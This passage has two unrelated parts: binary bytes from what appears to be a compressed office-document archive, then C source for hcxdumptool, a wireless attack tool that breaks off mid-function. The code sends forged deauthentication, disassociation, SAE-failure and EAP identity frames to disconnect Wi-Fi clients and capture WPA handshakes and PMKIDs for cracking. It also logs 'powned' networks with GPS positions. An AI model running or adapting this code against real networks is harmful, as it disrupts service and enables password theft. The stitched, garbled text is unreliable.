\c}YX}(drV(Z`*KPFQ][i[acTwB-FIh~95R*: 0 @"myzL(ΠhWG.X^SahܗcYZ_L{܀zPm[ܫ豀5UOk%{x;Gysk(gǮ׮oR ë5/e8b 3bFAQoƀ$%if(8 58ۡ&1("lI.YUp7S.|!ƻ5fU >7\+id?M\4UozPK)PKE=|N settings.xmlZr8}߯HffnB 5$a7a5,$9ߖ Y؄h%[:jw})4T+PR&~-\ɄP2L"pеz(QD3]$]3aM Gǧk|>?J5-WXF(bY (/F ˅9Ï*:b|W.;(F_]aW^ZW"GA9àqrWl.[R_'HoL[4fM&L(W.ʯqޅ݇IW ɨU/ l:KZ9'\0O-7N-v=a6 C!hhO?AcB"]%ŦCA⑴,d DMY,F%I>I܎t^2Ỳ'A7,<Ư]tޞpY10| iS3kk.[ڏ>Y`'~;ij4z>>C|emP7i0a}8F%M,w fȏosW,m&z8 Ԃ](\K=ݑ :Y0'sIYf,B3"p'~4C(;9O߃FDlKU)yVʧa[!j%o|+|LO+`衖|V0Q՛jvml&U9ma>:DϼDspf M4܄h Pth󵥱?VI܁1g vhW1s_[ǣMr[=D4o2˜(|6e uB LanKA/Z@e-M1<˫.kdXնZR>bHٱα=Dai~Z6]ea-7>8O#~1{K7y͒%U_щ{ӹ9b.2 EDR(9)SE0"_E lHae_<`퓅L2G%IxȺicNubU}U,"y!M(c]-a-( *6Wo-^ Y0ZHKCUFr)j"[eQ%ɣlϵR/,QRVlvN客j.3%s.23Z j}M2?&4xCg۪ʗyo#oFᰡwE©V%V6`~RKob64AQII,05fvtm$0۠g*h5?TЪ˛V_ϼr󮍫"+ 8mBU\]hY);yx< ASQ:`R =c!t"D)an˕ݼ{n4hzUȔimųCюNA86('E8h=R`ѶJy c{MZMRuIM&]N&OX8Qw,8,4鄆j;pfl]]~FyTĬ*H8۲B[ &Bod&!DOKȴÒ|yE09Ij=lq²DT<|WlȧZ-3ՁFl t~0WQok}xë2% ']j 'tpf&(4$ EW! "gW6#}E*r` Uif1Grƴ3T,*JO&6A2VSҿ l#MũMY˃]E 꼝ckOUa\σM1n 8 7`b*(V}5U*ȇ /,Иn4[&thH,wQQ%E=aQxC?wewLTؒ1.1MAmo4mkL) `aڔ+6hQC §["Pc++hH8I@Vnr`   q>W j?>ey !gVq%q;'z BLv4]p>eqK3p/8yj293.@h>@?MS( *|YagJ_p(zAOnT?0btG(|MF˰&#w.ù ,It%u$4QiG[[QOfRҚfZ刘ܒqEiLoIjWFlES7 {jq9dʜ=֤ 2^]-SNp3tڟMk3a[h5/;^gq4r^rgm^3s?oI9 Kv[ϳچa$溠r#qhH@.wL-EmޒWA2Ϡ١;GՊ!$I@rS*KNA*$ (u:띖$Id(Dөhȣj0Bd$:eTI:R4U-,!)(u:%A(ϼ:@$$L}BuhУj0#)[N#USHTMUjO$Ȗ{Z% I"SG]t:4;Z-lI:KUY$)Fh锄<I$2 }eNACHRlUӑja% ITEs(ʁG ij\jO SEA&iuW~Z.JB#^KЗxぁ!o3r &mև`owd11=3~HȽ #}P % n-6+"AH$U־S-4f24h@k<+ Fv_ !!6\ʭv*)1ObrF< <"r7wG` {ÿgyR'5 ٬Y9 Yl{d$Y"Ga-ഓTJsT|C&S CkƊI@tv}+g$3T43#=q{αp &o>]1ߥy  TC,???EG$U֙zJ!U`w݆]W$Z<&FrSP.@C߮t=Z$Z]u>>EEELLLSSS\\\dddkkksss{{{׫ٲ˻¶ͿĶ޷޽ѽL {IDATx #jy &}B?\CٖV֭{w`faM{7c` 10c` 10c` 10c` 10c` 10c` 10c` 10c` 10(&=R?t7/!#HJ2RrIS! f.[.L0sSˑF[TA(]fIk'4(t ZMQhz% l-l ilJ6sc-8mU[cRɵd:UU5*RM\(4ݥ1rJA"xQ2 '`A 9GS3iW_>[*{7x0 oʶN;\` @3:NQ*Ū*dXC+H5nCR{ImTS+-󡮿Q6n6#?9S Ż ݢܰ{Buz-#Z\c+$ e -sFHR ֪.Jy,Ή0ޢ{jׁEAE c,1;P1`ɔƨP?.ǧ^/vI#ޞS?~WLDvx0`S$bR _6}@"5&LBWd7,з_ߋɠ3ڃRӆG, H4s!#X`Tűax0˧/Oqߞ~Y?OOK~<7ϟ>i i?t#BƲ>$X4p[jx`i;FuKxK% 404 HcF`*%Z}#$s^A?2mޓh|z-MUgnJ;P4ӤMBeץKchOO'oy { 7;٨E=_&n튷rD.U>lCOzevT˭HÊfDo@N;7Gn*8d_̬]U;AQsZmcDKJ3iy YS:+ sRC_d.7mhx'c}aO4>{~,FO<!&|!14Kg,x0/6,c!w~vlN+M1(N*C?pO>t4$N~㰰dU~~[bjͱ渕"~wܮo#UbT1`8'~]Sy<QTSm«wR u0~{k'4-}[7M1@mTr d6{'l]; ^}E\;[/&0{/7㔱|b; tܗzq͗K$!b/B@\'x%ef 34=+m O˾u:ۙdn$q7IbZ{rƮu.ۂ*(wSq !RErQL}o)bq/{ p\#N6]q&_˽AYjk1!gRU™OaN(Y]>KTm=djźIʗ3y!f ac2"! |S/7fz+[2K> ۢ5-LRMA\EZa62 $_[Q(&K};"z Vb%07*Z#Y,f/}w0R+V87?SQkhaƥOd-;@ }i|ȕs,#aY*c9 !õ`p5ނl pDzjSkcgm!x a$?%~Wk7!Q !u? ~df%4#5!>"db\0htp'A&9|79~_z9`:,U4_]BOfr~B!^`rtgӫ`zBKmp9j_:(:)anx\4}\&]>=h˜J\ߌg\-c+<2ڣdpH[*l .I0 FQ0nCކP4Qt%֙j; 3OQ4=DOUb]ek N,) "/%}%- VrL=E,%fb1aI.+&%PN R@ AI҄}lwFM|$V_n2Qю;6daxb%ƐQM`>*'z7_6'lPaZח\tpQ'O%o2m39}!zrCpE(@x}MNP!4=!Bׯ.˓!4y\WO zq: N+Pd}cmޜvB`uWX ڭn/(Y&Ro!6P1yxo (POɠTdb ɥrz:#fNK>B>+ӽVx3kuAܓj*cbR պ?{:PgΦʃtuFTGKGjjj v~R [Zŭ9,k]h -Stϋ(: ucM@0_^d+G e*u]&_+$%t^|_;I3(N2)va.5bێZWݰ/r\Dw̾x8V78>%>.ۣ,y]KȒ,#.萜f f]=zfIg?KfWfGh 6ǩ,#@t Nle'jWMj"<Mp;T yR\gYkU.I+8fbP:J1يEԷKT +䀊vAKU&ȡ< |"/!581݋.4/fRѓW,47{&;8K.Nf-|-o5CU)Om&) >`U9lpF;FEBˁ.<=B7D;yXD7%}u9<Э.藍qW:GiOW*Rq;xzLϲM4 (܀V9. /fs*.沆]" 6U #C&^z1Ը{F5?ɤեp*ӄ (4ˇwXPI7PR׿Go£5vJ qdaWV`~ji 5~fL''PK3l RPKE=|NMETA-INF/manifest.xmlSKj0F{KmVEɢP3 >}m'.%Cv3}ݡw:CLaU@ڷH]þ_;7; ,Q +W $ ɬ@ew_NLn!`ˮC?N@jUD8 ~S-Pr`uP0PТ%@T$H : 'ԉ5:d#xMU rM/֞ո v%NN[d (zx*$\@Tb$_, #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef __ANDROID__ #include #define strdupa strdup #include "include/android-ifaddrs/ifaddrs.h" #include "include/android-ifaddrs/ifaddrs.c" #else #include #endif #include #include #include #include #include #include #include #include #include #include "include/version.h" #include "include/hcxdumptool.h" #include "include/rpigpio.h" #include "include/wireless-lite.h" #include "include/byteops.c" #include "include/ieee80211.c" #include "include/pcap.c" #include "include/strings.c" #include "include/hashops.c" /*===========================================================================*/ /* global var */ static int fd_socket; static int fd_socket_gpsd; static int fd_pcapng; static int fd_ippcapng; static int fd_weppcapng; static int fd_rcascanpcapng; static maclist_t *filterlist; static int filterlist_len; static struct ifreq ifr_old; static struct iwreq iwr_old; static aplist_t *aplist, *aplist_ptr; static int aplistcount; static myaplist_t *myaplist, *myaplist_ptr; static macmaclist_t *pownedlist; static enhanced_packet_block_t *epbhdr; static uint8_t *packet_ptr; static int packet_len; static uint8_t *ieee82011_ptr; static int ieee82011_len; static mac_t *macfrx; static uint8_t *payload_ptr; static int payload_len; static uint8_t *llc_ptr; static llc_t *llc; static uint8_t *mpdu_ptr; static mpdu_t *mpdu; static uint8_t statusout; static int gpsd_len; static int errorcount; static int maxerrorcount; static unsigned long long int incommingcount; static unsigned long long int outgoingcount; static unsigned long long int droppedcount; static unsigned long long int pownedcount; static int day; static int month; static int year; static int hour; static int minute; static int second; static long double lat; static long double lon; static long double alt; static bool wantstopflag; static bool ignorewarningflag; static bool poweroffflag; static bool staytimeflag; static bool gpsdflag; static bool activescanflag; static bool rcascanflag; static bool deauthenticationflag; static bool disassociationflag; static bool attackapflag; static bool attackclientflag; static int filtermode; static int eapoltimeout; static int deauthenticationintervall; static int deauthenticationsmax; static int apattacksintervall; static int apattacksmax; static int staytime; static int stachipset; static uint8_t cpa; static int gpiostatusled; static int gpiobutton; static uint32_t myouiap; static uint32_t mynicap; static uint32_t myouista; static uint32_t mynicsta; static uint64_t timestamp; static uint64_t timestampstart; struct timeval tv; static uint64_t mytime; static int mydisassociationsequence; static int myidrequestsequence; static int mydeauthenticationsequence; static int mybeaconsequence; static int myproberequestsequence; static int myauthenticationrequestsequence; static int myauthenticationresponsesequence; static int myassociationrequestsequence; static int myassociationresponsesequence; static int myproberesponsesequence; static char *interfacename; static char *pcapngoutname; static char *ippcapngoutname; static char *weppcapngoutname ; static char *filterlistname; static char *rcascanlistname; static char *rcascanpcapngname; static const uint8_t hdradiotap[] = { 0x00, 0x00, // radiotap version + pad byte 0x0e, 0x00, // radiotap header length 0x06, 0x8c, 0x00, 0x00, // bitmap 0x00, // flags 0x02, // rate 0x14, // tx power 0x01, // antenna 0x08, 0x00 // tx flags #define HDRRT_SIZE sizeof(hdradiotap) }; static uint8_t channeldefaultlist[] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96, 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128, 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159, 161, 161, 165, 169, 173, 0 }; static uint8_t channelscanlist[128] = { 1, 6, 2, 11, 1, 13, 6, 11, 1, 6, 3, 11, 1, 12, 6, 11, 1, 6, 4, 11, 1, 10, 6, 11, 1, 6, 11, 5, 1, 6, 11, 8, 1, 9, 6, 11, 1, 6, 11, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; static uint8_t mac_orig[6]; static uint8_t mac_mysta[6]; static uint8_t mac_myap[6]; static uint8_t mac_mybcap[6]; static unsigned long long int rcrandom; static uint8_t anoncerandom[32]; static uint64_t lasttimestampm1; static uint8_t laststam1[6]; static uint8_t lastapm1[6]; static uint64_t lastrcm1; static uint64_t lasttimestampm2; static uint8_t laststam2[6]; static uint8_t lastapm2[6]; static uint64_t lastrcm2; static uint8_t epb[PCAPNG_MAXSNAPLEN *2]; static char gpsddata[GPSDDATA_MAX +1]; /*===========================================================================*/ #ifdef DEBUG static inline void debugprint(int len, uint8_t *ptr) { static int p; fprintf(stdout, "\nRAW: "); for(p = 0; p < len; p++) { fprintf(stdout, "%02x", ptr[p]); } fprintf(stdout, "\n"); return; } #endif /*===========================================================================*/ static inline void checkunwanted(char *unwantedname) { static FILE *fp; static char pidline[1024]; static char *pidptr = NULL; memset(&pidline, 0, 1024); fp = popen(unwantedname,"r"); if(fp) { pidptr = fgets(pidline, 1024, fp); if(pidptr != NULL) { fprintf(stderr, "warning: %s is running with pid %s", &unwantedname[6], pidline); } pclose(fp); } return; } /*===========================================================================*/ static inline bool checkmonitorinterface(char *checkinterfacename) { static char *monstr = "mon"; if(checkinterfacename == NULL) { return true; } if(strstr(checkinterfacename, monstr) == NULL) { return false; } return true; } /*===========================================================================*/ static inline void checkallunwanted() { static char *networkmanager = "pidof NetworkManager"; static char *wpasupplicant = "pidof wpa_supplicant"; checkunwanted(networkmanager); checkunwanted(wpasupplicant); return; } /*===========================================================================*/ static inline void saveapinfo() { static int c, p; static aplist_t *zeiger; static FILE *fhrsl; if((fhrsl = fopen(rcascanlistname, "w+")) == NULL) { fprintf(stderr, "error opening file %s", rcascanlistname); return; } qsort(aplist, aplist_ptr -aplist, APLIST_SIZE, sort_aplist_by_essid); zeiger = aplist; for(c = 0; APLIST_MAX; c++) { if(zeiger->timestamp == 0) { break; } for(p = 0; p< 6; p++) { fprintf(fhrsl, "%02x", zeiger->addr[p]); } if(isasciistring(zeiger->essid_len, zeiger->essid) != false) { fprintf(fhrsl, " %.*s", zeiger->essid_len, zeiger->essid); } else { fprintf(stdout, " $HEX["); for(p = 0; p < zeiger->essid_len; p++) { fprintf(fhrsl, "%02x", zeiger->essid[p]); } fprintf(stdout, "]"); } if(zeiger->status == 1) { fprintf(fhrsl, " [CHANNEL %d, AP IN RANGE]\n", zeiger->channel); } else { fprintf(fhrsl, " [CHANNEL %d]\n", zeiger->channel); } zeiger++; } fclose(fhrsl); return; } /*===========================================================================*/ __attribute__ ((noreturn)) static void globalclose() { static struct ifreq ifr; static char *gpsd_disable = "?WATCH={\"enable\":false}"; sync(); if(gpiostatusled > 0) { GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); } if(fd_socket > 0) { memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1); ioctl(fd_socket, SIOCSIFFLAGS, &ifr); if(ignorewarningflag == false) { ioctl(fd_socket, SIOCSIWMODE, &iwr_old); } ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old); if(close(fd_socket) != 0) { perror("failed to close raw socket"); } } if(gpsdflag == true) { if(write(fd_socket_gpsd, gpsd_disable, 23) != 23) { perror("failed to terminate GPSD WATCH"); } } if(fd_socket_gpsd > 0) { if(close(fd_socket_gpsd) != 0) { perror("failed to close gpsd socket"); } } if(fd_weppcapng > 0) { writeisb(fd_weppcapng, 0, timestampstart, incommingcount); if(fsync(fd_weppcapng) != 0) { perror("failed to sync wep pcapng file"); } if(close(fd_weppcapng) != 0) { perror("failed to close wep pcapng file"); } } if(fd_ippcapng > 0) { writeisb(fd_ippcapng, 0, timestampstart, incommingcount); if(fsync(fd_ippcapng) != 0) { perror("failed to sync ip pcapng file"); } if(close(fd_ippcapng) != 0) { perror("failed to close ip pcapng file"); } } if(fd_pcapng > 0) { writeisb(fd_pcapng, 0, timestampstart, incommingcount); if(fsync(fd_pcapng) != 0) { perror("failed to sync pcapng file"); } if(close(fd_pcapng) != 0) { perror("failed to close pcapng file"); } } if(filterlist != NULL) { free(filterlist); } if(aplist != NULL) { free(aplist); } if(myaplist != NULL) { free(myaplist); } if(pownedlist != NULL) { free(pownedlist); } if(rcascanflag == true) { if(fd_rcascanpcapng > 0) { writeisb(fd_rcascanpcapng, 0, timestampstart, incommingcount); if(fsync(fd_rcascanpcapng) != 0) { perror("failed to sync pcapng file"); } if(close(fd_rcascanpcapng) != 0) { perror("failed to close pcapng file"); } } if(rcascanlistname != NULL) { saveapinfo(); } } printf("\nterminated...\e[?25h\n"); if(poweroffflag == true) { if(system("poweroff") != 0) { printf("can't power off\n"); } } if(errorcount != 0) { exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /*===========================================================================*/ static inline void printapinfo() { static int c, p; static int rangecount; static aplist_t *zeiger; struct timeval tvfd; static char timestring[16]; rangecount = 0; zeiger = aplist; qsort(aplist, aplistcount, APLIST_SIZE, sort_aplist_by_essid); printf("\e[1;1H\e[2J"); for(c = 0; c < aplistcount; c++) { if(zeiger->timestamp == 0) { break; } tvfd.tv_sec = zeiger->timestamp /1000000; tvfd.tv_usec = 0; strftime(timestring, 16, "%H:%M:%S", localtime(&tvfd.tv_sec)); fprintf(stdout, "[%s] ", timestring); for(p = 0; p< 6; p++) { fprintf(stdout, "%02x", zeiger->addr[p]); } if((zeiger->essid_len == 0) || (zeiger->essid[0] == 0)) { fprintf(stdout, " "); } else { if(isasciistring(zeiger->essid_len, zeiger->essid) == true) { fprintf(stdout, " %.*s", zeiger->essid_len, zeiger->essid); } else { fprintf(stdout, " $HEX["); for(p = 0; p < zeiger->essid_len; p++) { fprintf(stdout, "%02x", zeiger->essid[p]); } fprintf(stdout, "]"); } } if(zeiger->status == 1) { fprintf(stdout, " [CHANNEL %d, AP IN RANGE]\n", zeiger->channel); rangecount++; } else { fprintf(stdout, " [CHANNEL %d]\n", zeiger->channel); } zeiger++; } fprintf(stdout, "INFO: cha=%d, rx=%llu, rx(dropped)=%llu, tx=%llu, err=%d, aps=%d (%d in range)\n" "-----------------------------------------------------------------------------------\n" , channelscanlist[cpa], incommingcount, droppedcount, outgoingcount, errorcount, aplistcount, rangecount); return; } /*===========================================================================*/ static inline void printtimenet(uint8_t *mac_to, uint8_t *mac_from) { static int p; static char timestring[16]; strftime(timestring, 16, "%H:%M:%S", localtime(&tv.tv_sec)); fprintf(stdout, "\33[2K\r[%s - %03d] ", timestring, channelscanlist[cpa]); for(p = 0; p< 6; p++) { fprintf(stdout, "%02x", mac_from[p]); } fprintf(stdout, " -> "); for(p = 0; p< 6; p++) { fprintf(stdout, "%02x", mac_to[p]); } return; } /*===========================================================================*/ static inline void printessid(int essidlen, uint8_t *essid) { static int p; if(essidlen == 0) { fprintf(stdout, " "); return; } if(isasciistring(essidlen, essid) != false) { fprintf(stdout, " %.*s", essidlen, essid); } else { fprintf(stdout, " $HEX["); for(p = 0; p < essidlen; p++) { fprintf(stdout, "%02x", essid[p]); } fprintf(stdout, "]"); } return; } /*===========================================================================*/ static inline void printid(uint16_t idlen, uint8_t *id) { static int p; if(id[0] == 0) { return; } if(isasciistring(idlen, id) != false) { fprintf(stdout, " %.*s", idlen, id); } else { fprintf(stdout, " $HEX["); for(p = 0; p < idlen; p++) { fprintf(stdout, "%02x", id[p]); } fprintf(stdout, "]"); } return; } /*===========================================================================*/ static void writeepbm2(int fd) { static int epblen; static int written; static uint16_t padding; static total_length_t *totallenght; static int gpsdlen; static char *gpsdptr; static char *gpsd_time = "\"time\":"; static char *gpsd_lat = "\"lat\":"; static char *gpsd_lon = "\"lon\":"; static char *gpsd_alt = "\"alt\":"; static char aplesscomment[] = {"HANDSHAKE AP-LESS" }; #define APLESSCOMMENT_SIZE sizeof(aplesscomment) static char gpsdatabuffer[GPSDDATA_MAX]; epbhdr = (enhanced_packet_block_t*)epb; epblen = EPB_SIZE; epbhdr->block_type = EPBBID; epbhdr->interface_id = 0; epbhdr->cap_len = packet_len; epbhdr->org_len = packet_len; epbhdr->timestamp_high = timestamp >> 32; epbhdr->timestamp_low = (uint32_t)timestamp &0xffffffff; padding = (4 -(epbhdr->cap_len %4)) %4; epblen += packet_len; memset(&epb[epblen], 0, padding); epblen += padding; if(gpsdflag == false) { epblen += addoption(epb +epblen, SHB_COMMENT, APLESSCOMMENT_SIZE, aplesscomment); } else { if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL) { sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second); } if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } sprintf(gpsdatabuffer, "lat:%Lf,lon:%Lf,alt:%Lf,date:%02d.%02d.%04d,time:%02d:%02d:%02d\n%s", lat, lon, alt,day, month, year, hour, minute, second, aplesscomment); gpsdlen = strlen(gpsdatabuffer); epblen += addoption(epb +epblen, SHB_COMMENT, gpsdlen, gpsdatabuffer); } epblen += addoption(epb +epblen, OPTIONCODE_ANONCE, 32, (char*)anoncerandom); epblen += addoption(epb +epblen, SHB_EOC, 0, NULL); totallenght = (total_length_t*)(epb +epblen); epblen += TOTAL_SIZE; epbhdr->total_length = epblen; totallenght->total_length = epblen; written = write(fd, &epb, epblen); if(written != epblen) { errorcount++; } return; } /*===========================================================================*/ static void writeepb(int fd) { static int epblen; static int written; static uint16_t padding; static total_length_t *totallenght; static int gpsdlen; static char *gpsdptr; static char *gpsd_time = "\"time\":"; static char *gpsd_lat = "\"lat\":"; static char *gpsd_lon = "\"lon\":"; static char *gpsd_alt = "\"alt\":"; static char gpsdatabuffer[GPSDDATA_MAX]; epbhdr = (enhanced_packet_block_t*)epb; epblen = EPB_SIZE; epbhdr->block_type = EPBBID; epbhdr->interface_id = 0; epbhdr->cap_len = packet_len; epbhdr->org_len = packet_len; epbhdr->timestamp_high = timestamp >> 32; epbhdr->timestamp_low = (uint32_t)timestamp &0xffffffff; padding = (4 -(epbhdr->cap_len %4)) %4; epblen += packet_len; memset(&epb[epblen], 0, padding); epblen += padding; if(gpsdflag == true) { if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL) { sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second); } if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } sprintf(gpsdatabuffer, "lat:%Lf,lon:%Lf,alt:%Lf,date:%02d.%02d.%04d,time:%02d:%02d:%02d", lat, lon, alt,day, month, year, hour, minute, second); gpsdlen = strlen(gpsdatabuffer); epblen += addoption(epb +epblen, SHB_COMMENT, gpsdlen, gpsdatabuffer); } epblen += addoption(epb +epblen, SHB_EOC, 0, NULL); totallenght = (total_length_t*)(epb +epblen); epblen += TOTAL_SIZE; epbhdr->total_length = epblen; totallenght->total_length = epblen; written = write(fd, &epb, epblen); if(written != epblen) { errorcount++; } return; } /*===========================================================================*/ static inline uint8_t *gettag(uint8_t tag, uint8_t *tagptr, int restlen) { static ietag_t *tagfield; while(0 < restlen) { tagfield = (ietag_t*)tagptr; if(tagfield->id == tag) { if(restlen >= (int)tagfield->len +(int)IETAG_SIZE) { return tagptr; } else { return NULL; } } tagptr += tagfield->len +IETAG_SIZE; restlen -= tagfield->len +IETAG_SIZE; } return NULL; } /*===========================================================================*/ static inline bool checkfilterlistentry(uint8_t *filtermac) { static int c; static maclist_t * zeiger; zeiger = filterlist; for(c = 0; c < filterlist_len; c++) { if(memcmp(zeiger->addr, filtermac, 6) == 0) { return true; } zeiger++; } return false; } /*===========================================================================*/ static inline int checkpownedap(uint8_t *macap) { static int c; static macmaclist_t *zeiger; zeiger = pownedlist; for(c = 0; c < POWNEDLIST_MAX; c++) { if(zeiger->timestamp == 0) { return 0; } if(memcmp(zeiger->addr2, macap, 6) == 0) { return zeiger->status; } zeiger++; } return 0; } /*===========================================================================*/ static inline int checkpownedstaap(uint8_t *pownedmacsta, uint8_t *pownedmacap) { static int c; static macmaclist_t *zeiger; zeiger = pownedlist; for(c = 0; c < POWNEDLIST_MAX; c++) { if(zeiger->timestamp == 0) { return 0; } if((memcmp(zeiger->addr1, pownedmacsta, 6) == 0) && (memcmp(zeiger->addr2, pownedmacap, 6) == 0)) { return zeiger->status; } zeiger++; } return 0; } /*===========================================================================*/ static inline int addpownedstaap(uint8_t *pownedmacsta, uint8_t *pownedmacap, uint8_t status) { static int c; static macmaclist_t *zeiger; zeiger = pownedlist; for(c = 0; c < POWNEDLIST_MAX -1; c++) { if(zeiger->timestamp == 0) { break; } if((memcmp(zeiger->addr1, pownedmacsta, 6) == 0) && (memcmp(zeiger->addr2, pownedmacap, 6) == 0)) { if((zeiger->status & status) == status) { return zeiger->status; } zeiger->status |= status; if(status > RX_M1) { pownedcount++; } return 0; } zeiger++; } zeiger->timestamp = timestamp; zeiger->status = status; memcpy(zeiger->addr1, pownedmacsta, 6); memcpy(zeiger->addr2, pownedmacap, 6); if(status > RX_M1) { pownedcount++; } qsort(pownedlist, c +1, MACMACLIST_SIZE, sort_macmaclist_by_time); return 0; } /*===========================================================================*/ static void send_requestidentity(uint8_t *macsta, uint8_t *macap) { static mac_t *macftx; static const uint8_t requestidentitydata[] = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x88, 0x8e, 0x01, 0x00, 0x00, 0x0a, 0x01, 0x63, 0x00, 0x0a, 0x01, 0x68, 0x65, 0x6c, 0x6c, 0x6f }; #define REQUESTIDENTITY_SIZE sizeof(requestidentitydata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macsta) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macsta) == false)) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_QOS +REQUESTIDENTITY_SIZE +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_DATA; macftx->subtype = IEEE80211_STYPE_QOS_DATA; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->from_ds = 1; macftx->duration = 0x002c; macftx->sequence = myidrequestsequence++ << 4; if(myidrequestsequence >= 4096) { myidrequestsequence = 0; } memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_QOS], &requestidentitydata, REQUESTIDENTITY_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_QOS +REQUESTIDENTITY_SIZE) < 0) { perror("\nfailed to transmit requestidentity"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static void send_disassociation(uint8_t *macsta, uint8_t *macap, uint8_t reason) { static uint8_t retstatus; static mac_t *macftx; static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } retstatus = checkpownedstaap(macsta, macap); if((retstatus &RX_PMKID) == RX_PMKID) { return; } if((retstatus &RX_M23) == RX_M23) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DISASSOC; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; macftx->sequence = mydisassociationsequence++ << 4; if(mydisassociationsequence >= 4096) { mydisassociationsequence = 0; } packetout[HDRRT_SIZE +MAC_SIZE_NORM] = reason; if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +2) < 0) { perror("\nfailed to transmit deuthentication"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static void send_saefailure(uint8_t *macsta, uint8_t *macap, uint16_t saesequence) { static uint8_t retstatus; static mac_t *macftx; static const uint8_t saeerrordata[] = { 0x03, 0x00, 0x02, 0x00, 0x01, 0x00 }; #define SEAERROR_SIZE sizeof(saeerrordata) static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } retstatus = checkpownedstaap(macsta, macap); if((retstatus &RX_PMKID) == RX_PMKID) { return; } if((retstatus &RX_M23) == RX_M23) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_AUTH; memcpy(macftx->addr1, macsta, 6); memcpy(macftx->addr2, macap, 6); memcpy(macftx->addr3, macap, 6); macftx->duration = 0x013a; saesequence++; if(saesequence >= 4096) { saesequence = 0; } macftx->sequence = saesequence << 4; memcpy(&packetout[HDRRT_SIZE +MAC_SIZE_NORM], &saeerrordata, SEAERROR_SIZE); if(write(fd_socket, packetout, HDRRT_SIZE +MAC_SIZE_NORM +SEAERROR_SIZE) < 0) { perror("\nfailed to transmit deuthentication"); errorcount++; outgoingcount--; } fsync(fd_socket); outgoingcount++; return; } /*===========================================================================*/ static void send_broadcast_deauthentication(uint8_t *macap, uint8_t reason) { static uint8_t retstatus; static mac_t *macftx; static uint8_t packetout[1024]; if((filtermode == 1) && (checkfilterlistentry(macap) == true)) { return; } if((filtermode == 2) && (checkfilterlistentry(macap) == false)) { return; } retstatus = checkpownedap(macap); if((retstatus &RX_PMKID) == RX_PMKID) { return; } if((retstatus &RX_M23) == RX_M23) { return; } memset(&packetout, 0, HDRRT_SIZE +MAC_SIZE_NORM +2 +1); memcpy(&packetout, &hdradiotap, HDRRT_SIZE); macftx = (mac_t*)(packetout +HDRRT_SIZE); macftx->type = IEEE80211_FTYPE_MGMT; macftx->subtype = IEEE80211_STYPE_DEAUTH; memcpy(macftx->addr1, &mac_broadcast, 6); memcpy(macftx->addr2, macap, 6); 